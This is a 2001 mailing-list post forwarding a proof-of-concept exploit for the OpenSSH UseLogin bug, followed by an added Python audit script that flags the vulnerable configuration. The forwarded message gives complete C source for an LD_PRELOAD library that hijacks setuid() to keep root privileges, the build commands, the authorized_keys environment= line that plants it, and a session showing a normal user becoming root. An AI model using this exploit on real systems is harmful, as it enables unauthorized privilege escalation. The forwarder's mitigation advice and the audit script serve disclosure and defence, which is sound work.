Subject: Fwd: OpenSSH UseLogin proof of concept exploit
To: None <>
From: Lubomir Sedlacik <>
List: netbsd-users
Date: 12/06/2001 02:49:49


confirmed on:

NetBSD 1.5X  - OpenSSH_2.9 NetBSD_Secure_Shell-20010624
NetBSD 1.5.2 - OpenSSH_2.5.1 NetBSD_Secure_Shell-20010614

everyone who uses "UseLogin yes" and has key authentication allowed for local
users, please at least set "UseLogin no" or comment it out.

----- Forwarded message from "[WaR]" <> -----

Date: Thu, 6 Dec 2001 00:34:34 +0000
From: "[WaR]" <>
Subject: OpenSSH UseLogin proof of concept exploit

--[ OpenSSH UseLogin bug proof of concept exploit ]--
  by [WaR] <> /

--[ Intro ]--

 I was very curious in finding out how to exploit this problem. Although
 I don't think anyone uses this feature, I looked into the matter anyway.
 Here it goes. It was tested on the following platforms:
  - Slackware 7.1 with OpenSSH3.0p1
  - RedHat 7.1 with OpenSSH_2.9p2
  - RedHat 7.2 with OpenSSH-3.0.1p1 (thx scorpio)
  - OpenBSD 2.9 with OpenSSH_2.9 (thx pmsac)
 The exploit should work as long as UseLogin does. YMMV.

 This is based on libroot from,
 published a few years ago for exploiting the telnetd LD_PRELOAD bug (and
 you thought it wouldn't happen again...).

 Kudos to for his help figuring out the problem with
 the Slackware UseLogin, testing on OpenBSD, and giving the idea for
 the seteuid(0) (it originally was a system("/bin/sh");).

--[ Code ]--

 Create a lib.c file with the following content:

 #include <stdio.h>
 #include <unistd.h>
 int setuid(uid_t uid){          /* preloaded in place of libc's setuid() */
   printf("setuid() called...\n");
   seteuid(0);                   /* keep euid 0 instead of dropping privileges, as described below */
   return 0;
 }

 Compile it into a library:
 gcc -c -o lib.o lib.c
 ld -shared -o lib.o
 chmod 755 ./

 Now, for the tricky (*g*) part...

 You must have an account on the machine, and create an entry
 on $HOME/.ssh/authorized_keys (or authorized_keys2) with:

 environment="LD_PRELOAD=<your home>/" <your public key>

 When sshd receives your connection, it will export this variable
 into the environment *BEFORE* running login. Somewhere after this,
 it executes a setuid. When it does, it makes a seteuid(0).

 $ id
 uid=1000(war) gid=100(users) groups=100(users)
 $ ssh war@localhost
 Enter passphrase for key '/home/war/.ssh/id_dsa':
 sh-2.04# id
 uid=0(root) gid=100(users) groups=100(users)

 It also works remotely. Anyway, you _MUST_ have an account on
 the victim machine so you can set up the environment, and log in.
 And obviously (duh) it must have UseLogin enabled.

 That's all.

 shout outs to Zav @, Smil3r, and everyone at

-- [WaR]
"if you can't hack it, hit it with a hammer"

----- End forwarded message -----


-- Lubomir Sedlacik <>   ASCII Ribbon campaign against  /"\
--                  <>   e-mail in gratuitous HTML and  \ /
--                                       Microsoft proprietary formats   X
-- PGPkey:                                  / \
-- Key Fingerprint: DBEC 8BEC 9A90 ECEC 0FEF  716E 59CE B70B 7E3B 70E2
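The forwarded post needs two things at once: "UseLogin yes" in sshd_config and an environment="LD_PRELOAD=..." option in a user's authorized_keys. The following audit checks a host for both and is an added example, not code from either message; the sample sshd_config and authorized_keys contents, the placeholder key blobs and the library path /home/war/preload.so are constructed.

```python
import re

# A user-chosen value for a dynamic-loader variable (LD_PRELOAD and friends) is what
# the post relies on once UseLogin hands the environment to a root-running login(1).
LOADER_VAR_RE = re.compile(r"^LD_[A-Z0-9_]*$")
# environment="NAME=value" option in authorized_keys (quotes inside may be escaped).
ENV_OPT_RE = re.compile(r'environment="((?:[^"\\]|\\.)*)"', re.IGNORECASE)

# Constructed sample files; the key blobs are placeholders, not real keys.
SSHD_CONFIG = """\
#UseLogin no
UseLogin yes
"""
AUTHORIZED_KEYS = """\
environment="LD_PRELOAD=/home/war/preload.so" ssh-dss AAAAB3...placeholder war@localhost
environment="PATH=/usr/bin",environment="EDITOR=vi" ssh-rsa AAAAB3...placeholder ok@localhost
ssh-rsa AAAAB3...placeholder plain@localhost
"""

def use_login_enabled(sshd_config):
    """True for an effective 'UseLogin yes'; first occurrence wins, default is no."""
    for line in sshd_config.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        if parts[0].lower() == "uselogin":
            return len(parts) == 2 and parts[1].lower() == "yes"
    return False

def loader_overrides(authorized_keys):
    """(line_no, name, value) for each environment= option that names an LD_* variable."""
    hits = []
    for no, line in enumerate(authorized_keys.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue
        for m in ENV_OPT_RE.finditer(line):
            name, _, value = m.group(1).partition("=")
            if LOADER_VAR_RE.match(name):
                hits.append((no, name, value))
    return hits

def audit(sshd_config, authorized_keys):
    """The bug needs both halves: report each one and flag the combination."""
    login, hits = use_login_enabled(sshd_config), loader_overrides(authorized_keys)
    findings = ["UseLogin yes: login(1) inherits the user's environment= options"] if login else []
    findings += ["authorized_keys line %d sets %s=%s" % h for h in hits]
    if login and hits:
        findings.append("EXPLOITABLE: set 'UseLogin no' and drop the environment= options")
    return findings
```

Run audit() over the real /etc/ssh/sshd_config and every user's ~/.ssh/authorized_keys and authorized_keys2; either finding alone is worth fixing, the combination is the bug the post describes.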
